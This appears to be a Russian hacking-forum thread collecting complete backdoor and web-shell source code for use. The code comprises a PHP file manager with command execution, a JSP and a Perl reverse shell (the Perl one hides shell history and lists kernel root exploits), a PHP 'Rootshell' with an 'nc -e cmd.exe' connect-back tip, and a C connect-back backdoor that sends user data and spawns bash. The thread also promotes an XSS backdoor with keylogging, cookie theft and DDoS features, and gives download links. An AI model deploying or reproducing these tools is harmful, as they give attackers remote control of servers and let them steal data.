LotFree PHP Backdoor v1.5

<?php
function good_link($link)
{
$link=ereg_replace("/+","/",$link);
$link=ereg_replace("/[^/(..)]+/\.\.","/",$link);
$link=ereg_replace("/+","/",$link);
if(!strncmp($link,"./",2) && strlen($link)>2)$link=substr($link,2);
if($link=="")$link=".";
return $link;
}

$dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:".";
$dir=good_link($dir);
$rep=opendir($dir);
chdir($dir);

if(isset($_REQUEST["down"]) && $_REQUEST["down"]!="")
{
header("Content-Type: application/octet-stream");
header("Content-Length: ".filesize($_REQUEST["down"]));
header("Content-Disposition: attachment; filename=".basename($_REQUEST["down"]));
readfile($_REQUEST["down"]);
exit();
}
?>
<html>
<head><title>LOTFREE PHP Backdoor v1.5</title></head>
<body>
<br>
<?php
echo "Actuellement dans <b>".getcwd()."</b><br>\n";
echo "<b>dir = '$dir'</b><br>\n";
echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez sur une croix pour effacer un fichier !<br><br>\n";

if(isset($_REQUEST['cmd']) && $_REQUEST['cmd']!="")
{
echo "<pre>\n";
system($_REQUEST['cmd']);
echo "</pre>\n";
}

if(isset($_FILES["fic"]["name"]) && isset($_POST["MAX_FILE_SIZE"]))
{
if($_FILES["fic"]["size"]<$_POST["MAX_FILE_SIZE"])
{
if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FILES["fic"]["name"])))
{
echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["name"])."!<br>\n";
}
else echo "upload failed: ".$_FILES["fic"]["error"]."<br>\n";
}
else echo "fichier trop gros!<br>\n";
}

if(isset($_REQUEST['rm']) && $_REQUEST['rm']!="")
{
if(unlink($_REQUEST['rm']))echo "fichier ".$_REQUEST['rm']." efface !<br>\n";
else echo "Impossible de supprimer le fichier<br>\n";
}

?>
<hr>
<table align="center" width="95%" border="0" cellspacing="0" bgcolor="lightblue">
<?php
$t_dir=array();
$t_file=array();
$i_dir=0;
$i_file=0;
while($x=readdir($rep))
{
if(is_dir($x))$t_dir[$i_dir++]=$x;
else $t_file[$i_file++]=$x;
}
closedir($rep);
while(1)
{
?>
<tr>
<td width="20%" bgcolor="lightgray" valign="top">
<?php
if($x=each($t_dir))
{
$name=$x["value"];
if($name=='.'){}
elseif($name=='..') echo " <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/../")."'>UP</a><br><br>\n";
else echo " <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/$name")."'>".$name."</a>\n";
}
?>
</td>
<td width='78%'<?php
if($y=each($t_file))
{
if($y["key"]%2==0)echo " bgcolor='lightgreen'>\n";
else echo ">\n";
echo " <a href='".$_SERVER['PHP_SELF']."?dir=$dir&down=".$y["value"]."'>".$y["value"]."</a>\n";
}
else echo ">\n";
?>
</td>
<td valign='center' width='2%'<?php
if($y)
{
if($y["key"]%2==0)echo " bgcolor='lightgreen'";
echo "><a href='".$_SERVER['PHP_SELF']."?dir=$dir&rm=".$y["value"]."'><b>X</b></a>";
}
else echo ">\n";
?></td>
</tr>
<?php
if(!$x && !$y)break;
}
?>
</table>
<hr>
<br>
<a href="<?php echo $_SERVER['PHP_SELF']; ?>?dir=">revenir au repertoire d'origine</a><br><br>
<form method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
Executer une commande <input type="text" name="cmd"> <input type="submit" value="g0!">
</form><br>
Uploader un fichier dans le repertoire courant :<br>
<form enctype="multipart/form-data" method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
<input type="file" name="fic"><input type="hidden" name="MAX_FILE_SIZE" value="100000">
<input type="submit" value="upl0ad!"></form><br>
<br>
<center>
PHP Backdoor Version 1.5<br>
by sirius_black / LOTFREE TEAM<br>
Execute commands, browse the filesystem<br>
Upload, download and delete files...<br>
<a href="http://www.lsdp.net/~lotfree">http://www.lsdp.net/~lotfree</a><br>
</center>
</body>
</html>

Автор: ~lotfree

JSP Backdoor Reverse Shell

// backdoor.jsp
< %@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
% >
< %!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;

StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}

public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;

try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));

char buffer[] = new char[8192];
int lenRead;

while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)

try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
}
}
% >

<h1>JSP Backdoor Reverse Shell</h1>

<form method="post">
IP Address
<input type="text" name="ipaddress" size=30>
Port
<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<hr>

< %
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");

if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());

Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");

StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());

StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());

outputConnector.start();
inputConnector.start();
}
catch(Exception e)
}
% >

Perl BackConnectShell + Rootlab t00l
#!/usr/bin/perl
# D.O.M TEAM - 2007
# anonyph; arp; ka0x; xarnuz
# 2005 - 2007
# BackConnectShell + Rootlab t00l
# priv8!
# 3sk0rbut0@gmail.com
#
# Backconnect by data cha0s (modificada por D.O.M)
# r00t l4b by D.O.M
#
# ka0x:~/Desktop # ./nc -lvvp 8600
# listening on [any] 8600 ...
# 66.232.128.123: inverse host lookup failed: h_errno 11004: NO_DATA
# connect to [00.00.00.00] from (UNKNOWN) [66.232.128.123] 40444: NO_DATA

# ******* ConnectBack Shell *******

# Linux version 2.6.9-022stab078.14-smp (root@kern268.build.sw.ru) (gcc version 3.
# 3.3 20040412 (Red Hat Linux 3.3.3-7)) #1 SMP Wed Jul 19 14:26:20 MSD 2006
# apache
# uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2523(psaserv)
# /home/httpd/vhosts/holler.co.uk/httpdocs/datatest

# Kernel local: 2.6.9-022stab078.14-smp

# P0sible 3xploit: exp.sh
# P0sible 3xploit: krad3
# P0sible 3xploit: newsmp
# P0sible 3xploit: ptrace_kmod
# P0sible 3xploit: py2
# P0sible 3xploit: ong_bak
# P0sible 3xploit: prctl3
# P0sible 3xploit: prctl
# P0sible 3xploit: kmdx
# P0sible 3xploit: pwned
#
# sh: no job control in this shell
# sh-2.05b$

use IO::Socket;
use Socket;
use FileHandle;

$system = '/bin/bash';
if(!$ARGV[0])
{
print "\nBackConnect Shell - D.O.M TEAM\n\n";
print "Usage: perl $0 [IPHOST] [NCPORT]\n";
print "Example: perl $0 82.85.55.21 6850\n\n";
exit;
}

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) ||
die print "[-] Protocolo Desconocido\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) ||
die print "[-] Error Socket\n";
print "[+] BackConnect Shell\n";
print "[+] Conectando a $ARGV[0]... \n";
print "[+] Enviando Shell... \n";
print "[+] Conectado. \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "\n******* ConnectBack Shell *******\n\n";
system("unset HISTFILE;unset SAVEHIST ;cat /proc/version;whoami;id;who;pwd");

# Rootkernel

my $khost = `uname -r`;
chomp($khost);
print "\nKernel local: $khost\n\n";

my %h;
$h{'w00t'} = { vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4. 16','2.4.20'] };
$h{'brk'} = { vuln=>['2.4.22','2.4.21','2.4.10','2.4.20'] };
$h{'ave'} = { vuln=>['2.4.19','2.4.20'] };
$h{'elflbl'} = { vuln=>['2.4.29'] };
$h{'elfdump'} = { vuln=>['2.4.27'] };
$h{'expand_stack'} = { vuln=>['2.4.29'] };
$h{'h00lyshit'} = { vuln=>['2.6.8','2.6.10','2.6.11','2.6.12'] };
$h{'kdump'} = { vuln=>['2.6.13'] };
$h{'km2'} = { vuln=>['2.4.18','2.4.22'] };
$h{'krad'} = { vuln=>['2.6.11'] };
$h{'krad3'} = { vuln=>['2.6.11','2.6.9'] };
$h{'local26'} = { vuln=>['2.6.13'] };
$h{'loko'} = { vuln=>['2.4.22','2.4.23','2.4.24'] };
$h{'mremap_pte'} = { vuln=>['2.4.20','2.2.25','2.4.24'] };
$h{'newlocal'} = { vuln=>['2.4.17','2.4.19'] };
$h{'ong_bak'} = { vuln=>['2.4.','2.6.'] };
$h{'ptrace'} = { vuln=>['2.2.24','2.4.22'] };
$h{'ptrace_kmod'} = { vuln=>['2.4.','2.6.'] };
$h{'ptrace24'} = { vuln=>['2.4.9'] };
$h{'pwned'} = { vuln=>['2.4.','2.6.'] };
$h{'py2'} = { vuln=>['2.6.9','2.6.17','2.6.15','2.6.13'] };
$h{'raptor_prctl'} = { vuln=>['2.6.13','2.6.17','2.6.16','2.6.13'] };
$h{'prctl3'} = { vuln=>['2.6.13','2.6.17','2.6.9'] };
$h{'remap'} = { vuln=>['2.4.'] };
$h{'rip'} = { vuln=>['2.2.'] };
$h{'stackgrow2'} = { vuln=>['2.4.29','2.6.10'] };
$h{'uselib24'} = { vuln=>['2.4.29','2.6.10','2.4.22','2.4.25'] };
$h{'newsmp'} = { vuln=>['2.6.'] };
$h{'smpracer'} = { vuln=>['2.4.29'] };
$h{'loginx'} = { vuln=>['2.4.22'] };
$h{'exp.sh'} = { vuln=>['2.6.9','2.6.10','2.6.16','2.6.13'] };
$h{'prctl'} = { vuln=>['2.6.'] };
$h{'kmdx'} = { vuln=>['2.6.','2.4.'] };

&busca;
sub busca {
foreach my $key(keys %h){

foreach my $kernel ( @{ $h{$key}{'vuln'} } ){

if($khost=~/^$kernel/){
chop($kernel) if ($kernel=~/\.$/);
print "P0sible 3xploit: ". $key ."\n";
}
}
}
}
print "\n\n\n";
system 'export TERM=xterm;exec sh -i';
system($system);


__END__

PHP RootShell
<!--
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~ */
/* ................jdWMMMMMNk&,...JjdMMMHMMHA+................ */
/* .^.^.^.^.^.^..JdMMMBC:vHMMNI..`dMMM8C`ZMMMNs...^^. ^^.^^.^^. */
/* ..^.^..^.....dMMMBC`....dHNn...dMNI....`vMMMNy.... .....^... */
/* .....^..?XMMMMMBC!..dMM@MMMMMMM#MMH@MNZ,^!OMMHMMNk !..^...^. */
/* ^^.^..^.`??????!`JdN0??!??1OUUVT??????XQy!`??????! `..^..^.^ */
/* ..^..^.....^..^..?WN0`` ` +llz:` .dHR:..^.......^..^... */
/* ...^..^.^.^..^...`?UXQQQQQeyltOOagQQQeZVz`..^.^^.. ^..^..^.. */
/* ^.^..^..^..^..^.^..`zWMMMMH0llOXHMMMM9C`..^.....^. .^..^..^. */
/* ..^..^...^..+....^...`zHHWAwtltwAXH8I....^...?+... .^...^..^ */
/* ...^..^...JdMk&...^.^..^zHNkAAwWMHc...^.....jWNk+....^..^.. */
/* ^.^..^..JdMMMMNHo....^..jHMMMMMMMHl.^..^..jWMMMMNk +...^..^. */
/* .^....jdNMM9+4MMNmo...?+zZV7???1wZO+.^..ddMMM6?WMM Nmc..^..^ */
/* ^.^.jqNMM9C!^??UMMNmmmkOltOz+++zltlOzjQQNMMY?!`??W MNNmc^.^. */
/* ummQHMM9C!.uQo.??WMMMMNNQQkI!!?wqQQQQHMMMYC!.umx.? 7WMNHmmmo */
/* OUUUUU6:.jgWNNmx,`OUWHHHHHSI..?wWHHHHHW9C!.udMNHAx .?XUUUU9C */
/* .......+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMH A+......^ */
/* ..^..JdMMMMC`vMMMNkJuAAAAAy+...+uAAAAA&JdMMMBC`dMMMHs....^. */
/* ....dMMMMC``.``zHMMMMMMMMMMS==zXMMMMMMMMMM8v``.`?Z MMMNs.... */
/* dMMMMMBC!`.....`!?????1OVVCz^^`+OVVC??????!`....^` ?vMMMMMNk */
/* ??????!`....^.........?ztlOz+++zlltz!........^.... .???????! */
/* .....^.^^.^..^.^^...uQQHkwz+!!!+zwWHmmo...^.^.^^.^ ..^....^. */
/* ^^.^.....^.^..^...ugHMMMNkz1++++zXMMMMHmx..^....^. ^..^.^..^ */
/* ..^.^.^.....^...jdHMMMMM9C???????wWMMMMMHn+...^... .^..^..^. */
/* ^....^.^.^....JdMMMMMMHIz+.......?zdHMMMMMNA....^. .^...^..^ */
/* .^.^....^...JdMMMMMMHZttOz1111111zlttwWMMMMMNn..^. ^..^..^.. */
/* ..^.^.^....dNMMMMMWOOtllz!^^^^^^^+1lttOZWMMMMMNA,. ...^..^.. */
/* ^....^..?dNMMMMMC?1ltllllzzzzzzzzzlllltlz?XMMMMNNk +^..^..^. */
/* .^.^..+dNMM8T77?!`+lllz!!!!!!!!!!!!+1tll+`??777HMN Hm;..^..^ */
/* ..^..^jHMMNS`..^.`+ltlz+++++++++++++ztll+`....`dMM MHl.^..^. */
/* ....^.jHMMNS`^...`+ltlz+++++++++++++zltl+`^.^.`dMM MHl..^..^ */
/* ^^.^..jHMMNS`.^.^`+tllz+...........?+ltl+`.^..`dMM MHl...^.. */
/* ..^..^jHMMM6`..^.`+lltltltlz111zltlltlll+`...^`dMM MHl.^..^. */
/* ....^.jHNC``.^...`+zltlltlz+^^.+zltlltzz+`..^.^`?d MHl..^..^ */
/* .^.^..jHNI....^..^``+zltltlzzzzzltltlv!``.^...^..d MHc....^. */
/* ^...jdNMMNmo...^...^`?+ztlltllltlltz!``..^.^...dqN MMNmc.^.. */
/* .^.`?7TTTTC!`..^.....^`?!!!!!!!!!!!!`..^....^.`?7T TTTC!..^. */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~ */
/*
/* We should take care some kind of history, i will add here to keep a trace of changes (who made it).
/* Also I think we should increase the last version number by 1 if you make some changes.
/*
/* CHANGES / VERSION HISTORY:
/* ================================================== ==================================
/* Version Nick Description
/* - - - - - - - - - - - - - - - - - - - - - - - - - - -
/* 0.3.1 666 added an ascii bug :)
/* 0.3.1 666 password protection
/* 0.3.1 666 GET and POST changes
/* 0.3.2 666 coded a new uploader
/* 0.3.2 666 new password protection
/* 0.3.3 666 added a lot of comments :)
/* 0.3.3 666 added "Server Info"
/* 1.0.0 666 added "File Inclusion"
/* 1.0.0 666 removed password protection (nobody needs it...)
/* 1.0.0 666 added "Files & Directories"
/*
/*
-->
<?
//
// Default Changes
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

$owner = "Hacker"; // Insert your nick
$version = "1.0.0"; // The version

// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
//
?>

<body link="#000000" vlink="#000000" alink="#000000" bgcolor="#FFFFD5">
<style type="text/css">
body{
cursor:crosshair
}
</style>
<div align="center" style="width: 100%; height: 100">
<pre width="100%" align="center"><strong> ____ _ ____ _ _ _
| _ \ ___ ___ | |_ / ___|| |__ ___| | |
| |_) / _ \ / _ \| __| \___ \| '_ \ / _ \ | |
| _ < (_) | (_) | |_ _ ___) | | | | __/ | |
|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|</pre>
</div></strong>
<b><u><center><?php echo "This server has been infected by $owner"; ?></center></u></b>
<hr color="#000000" size="2,5">

<div align="center">
<center>
<p>
<?php
// Check for safe mode
if( ini_get('safe_mode') ) {
print '<font color=#FF0000><b>Safe Mode ON</b></font>';
} else {
print '<font color=#008000><b>Safe Mode OFF</b></font>';
}

?>
&nbsp;</p><font face="Webdings" size="6">!</font><br>
&nbsp;<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
<tr>
<td width="1%" height="25" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td>
</tr>
<tr>
<td width="49%" height="142">
<p align="center">
<font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
<br />
<b>Shell:</b> <? echo $SCRIPT_FILENAME ?>
<br>
<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br>
<b>Server Name:</b> <? echo $SERVER_NAME ?><br>
<b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?><br>
</font></tr>
</table><br />
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000">
<tr>
<td width="49%" height="25" bgcolor="#FCFEBA" valign="middle">
<p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td>
<td width="51%" height="26" bgcolor="#FCFEBA" valign="middle">
<p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td>
</tr>
<tr>
<td width="49%" height="142">
<p align="center"><form method="post">
<p align="center">
<br>
<font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br>
<br>
<textarea size="70" name="command" rows="2" cols="40" ></textarea> <br>
<br><input type="submit" value="Execute!"><br>
&nbsp;<br></p>
</form>
<p align="center">
<textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br>
<br>
<font face="Verdana" style="font-size: 8pt"><b>Info:</b> For a connect
back Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br>
</i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><p align="center"><br>
<form enctype="multipart/form-data" method="post">
<p align="center"><br>
<br>
<font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br>
<br>
<input type="file" name="file" size="20"><br>
<br>
<font style="font-size: 5pt">&nbsp;</font><br>
<input type="submit" value="Upload File!"> <br>
&nbsp;</p>
</form>
<?php

function check_file()
{
global $file_name, $filename;
$backupstring = "copy_of_";
$filename = $backupstring."$filename";

if( file_exists($filename))
{
check_file();
}
}

if(!empty($file))
{
$filename = $file_name;
if( file_exists($file_name))
{
check_file();
echo "<p align=center>File already exist</p>";
}

else
{
copy($file,"$filename");
if( file_exists($filename))
{
echo "<p align=center>File uploaded successful</p>";
}
elseif(! file_exists($filename))
{
echo "<p align=center>File not found</p>";
}
}
}
?>
<font face="Verdana" style="font-size: 8pt">
<p align=\"center\"></font>
</td>

</tr>
<tr>
<td width="49%" height="25" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ Files & Directories ]</font></td>
<td width="51%" height="19" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ File Inclusion ]</font></td>
</tr>
<tr>
<td width="49%" height="231">
<form method="post">
<p align="center">
<font face="Verdana" style="font-size: 11pt">
<?
$folder=opendir('./');
while ($file = readdir($folder)) {
if($file != "." && $file != "..")
echo '<a target="_blank" href="'.$file.'">'.$file.'</a ><br>';
}
closedir($folder);
?></p>
</form>
<p align="center">
<br>
&nbsp;<p align="center">&nbsp;</td>
<td width="51%" height="232">
<p align="center"><font face="Verdana" style="font-size: 8pt"><br>
Include
something :)<br>
<br>
&nbsp;</font><form method="POST">
<p align="center">
<input type="text" name="incl" size="20"><br>
<br>
<input type="submit" value="Include!" name="inc"></p>
</form>
<?php @$output = include($_POST['incl']); ?>
</td>
</tr>
</table>
</center>
</div>
<br /></p>
<div align="center">
<center>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
<tr>
<td width="100%" bgcolor="#FCFEBA" height="20">
<p align="center"><font face="Verdana" size="2">Rootshell v<?php echo "$version" ?> 2006 by <a style="text-decoration: none" target="_blank" href="http://www.SR-Crew.de.tt">SR-Crew</a> </font></td>
</tr>
</table>
</center>
</div>

Лооооооооооооооооолллл, последний бекдор самый страшный и крутой. Йа МУраВвейй!! =)))))))))))

b00zy_c0d3r,
Адрес: йа инопланетянчег
Йа МУраВвейй!! =)))))))))))
Так че?)

Ты лучше код исправь =\

Я понял, этот таракан пожирает моск одмина)))))

Ыы, исправил)
А то я не вдуплил к чему вы пишите)))))

Connect Back Backdoor v1.0 by L0rd]

Format of file: php
Size: 30kb
Description:
Script backconnects to your PC on port 2121 - Use netcat command: nc -vv -l -p 2121

0.1: Made it public!
0.2: Added different browser agent
Gave options, as opposed to automatic
Store reverse connect in the file, as opposed to downloading it
Made sure directory is writeable
0.3: Added upload function
Cleaned up the code a bit
Enforce filename wtf.php
Made it sexier
0.4: Phpinfo option
SQl backup option (modded version of rezen's backup script)
Added search for: yahoo, google, milw0rm, securiteam, packetstorm, warez
Added 'quick' options
Added more server info
0.5: Tar file/foler option
Create any filetype option
Make directory option
Search h4cky0u
More 'quick' options
Added nslookup, whoise, traceroute and ping
Added textarea for local files and command execution
Wget option added
Title change xD
Php parse time

http://i8.tinypic.com/6ferprm.jpg
http://i19.tinypic.com/52ml348.jpg



[ Donwload ] (http://depositfiles.com/files/1398037)

Simple connect-back backdoor for Unix


#include<stdio.h>
#include<string.h>
#include<stdlib.h>

#include<arpa/inet.h>
#include<netinet/in.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<sys/wait.h>

#include<unistd.h>
#include<errno.h>
#include<grp.h>
#include<pwd.h>

#define SHELL "/bin/bash"
#define LEN 100
#define USR_LEN 200

void error(const char *error)
{
if(errno != 0)
perror(error);
else
printf("Error in %s\n",error);
_exit(1);
}

/* sending information to connected host */
void send_information_to_user(int sockfd)
{
struct passwd *pw;
struct group *gr;
uid_t uid;
int st;
char host[LEN];
char domain[LEN];
char user_information[USR_LEN];
char grp_information[USR_LEN];
char me[] = "\t\tH00lyShit \t Backd00r\n\n\t\t By St0rM-MaN (Programming-fr34ks.net)\n";

if((st = gethostname(host , LEN)) == -1)
error("[!]Getting Host_Name");
if((st = getdomainname(domain , LEN)) == -1)
error("[!]Getting Domain Name");

strcat(host , "\n");
strcat(domain , "\n");

uid = getuid();

if((pw = getpwuid(uid)) == NULL)
error("[!]Grabbing User Information");
if((gr = getgrgid(pw->pw_gid)) == NULL)
error("[!]Grabbing Group Information");
sprintf(user_information , "\t\tUser (%s) uid(%d) shell(%s) home(%s)\n",
pw->pw_name , pw->pw_uid , pw->pw_shell , pw->pw_dir);
sprintf(grp_information , "\t\tGroup (%s) ,gid (%d)\n",gr->gr_name , gr->gr_gid);

if((st = send(sockfd , me , strlen(me) , 0)) < 0)
error("[!]Sending Information");
sleep(1);
if((st = send(sockfd ,host , strlen(host) , 0 )) < 0)
error("[!]Sending Information");
sleep(1);
if((st = send(sockfd , domain , strlen(domain) , 0)) < 0)
error("[!]Sending Information");
sleep(1);
if((st = send(sockfd , user_information , strlen(user_information) , 0)) < 0)
error("[!]Sending Information");
sleep(1);
if((st = send(sockfd , grp_information , strlen(grp_information) , 0)) < 0)
error("[!]Sending Information");
}
int main(int argc , char *argv[])
{
int z , st;
int sockfd;
int sock_len;
pid_t bind_sh;


struct sockaddr_in att;

if(argc < 3)
{
printf("usage %s ip_number port_number\n",argv[0]);
_exit(0);
}
printf("[+]Forming Address\n");
att.sin_family = AF_INET ;
att.sin_port = htons(atoi(argv[2]));
z = inet_aton(argv[1] , &att.sin_addr);
sock_len = sizeof(att);

if(z == 0)
error("[!]Host_IP Invaild\n");

printf("[+]Creating Socket\n");
sockfd = socket(PF_INET , SOCK_STREAM , 0);
if(sockfd < 0)
error("[!]Creating Socket Faild");


bind_sh = fork();

if(bind_sh == -1)
{
error("Cannot Open New Process");
}else if (bind_sh == 0)
{
printf("[+]Binding Shell\n");
printf("[+]Connecting\n");
printf("[+]Sending_User Infromation\n");
z = connect(sockfd , (struct sockaddr*)&att , sock_len);
if(z == -1)
error("[!]Connection error");

send_information_to_user(sockfd);


if((dup2(sockfd , 0) == -1) ||
(dup2(sockfd , 1) == -1) ||
(dup2(sockfd , 3) == -1));

execl(SHELL , SHELL , NULL);
}else
{
wait(&st); /* kinda useless but safe */
}

printf("Done\n");
return 0;
}



http://www.packetstormsecurity.org/UNIX/penetration/rootkits/rcbd.c

Simple connect-back backdoor for Unix
В сабж, написано на Php

XSS Shell v.0.3.9[ASP]
XSS Shell is a powerful XSS backdoor which allows interactively getting control over a Cross-site Scripting (XSS) vulnerability in a web application. Demonstrates the real power and damage of Cross-site Scripting attacks.

WHAT IS XSS SHELL ?

XSS Shell is powerful a XSS backdoor and zombie manager. This concept first presented by XSS-Proxy (http://xss-proxy.sourceforge.net/). Normally in XSS attacks attacker has one shot, in XSS Shell you can interactively send requests and get responses from victim, you can backdoor the page.

You can steal basic auth, you can bypass IP restrictions in administration panels, you can DDoS some systems with a permanent XSS vulnerability etc. Attack possibilities are limited with ideas. Basically this tool demonstrates that you can do more with XSS.

FEATURES

XSS Shell has several features to gain whole access over victim. Also you can simply add your own commands.

Most of the features can enable or disabled from configuration or can be tweaked from source code.

Features:

* Regenerating Pages
* Keylogger
* Mouse Logger (click points + current DOM)

Built-in Commands:

* Get Keylogger Data
* Get Current Page (Current rendered DOM / like screenshot)
* Get Cookie
* Execute supplied javaScript (eval)
* Get Clipboard (IE only)
* Get internal IP address (Firefox + JVM only)
* Check victimr17;s visited URL history
* DDoS
* Force to Crash victimr17;s browser

Download (http://www.filemaster.ru/files/i0733)
Пароль на архив: shgf76S*G - [xeka.ru]

извените меня за тупость но что этот сплоит позволяет залить шелл с помощью xss ?

и как им пользоваться? опять прошу прощение за незнания английского(учил немецкий) вот например есть хсс www.site.ru/d="><script>alert()</script>

как я понимаю наверно нужно вставить на страницу с хсс какойто скрипт из папки xssshell\js\ только какой?

и некак непонимаю каак можно залить шелл через js это ведь клиентский язык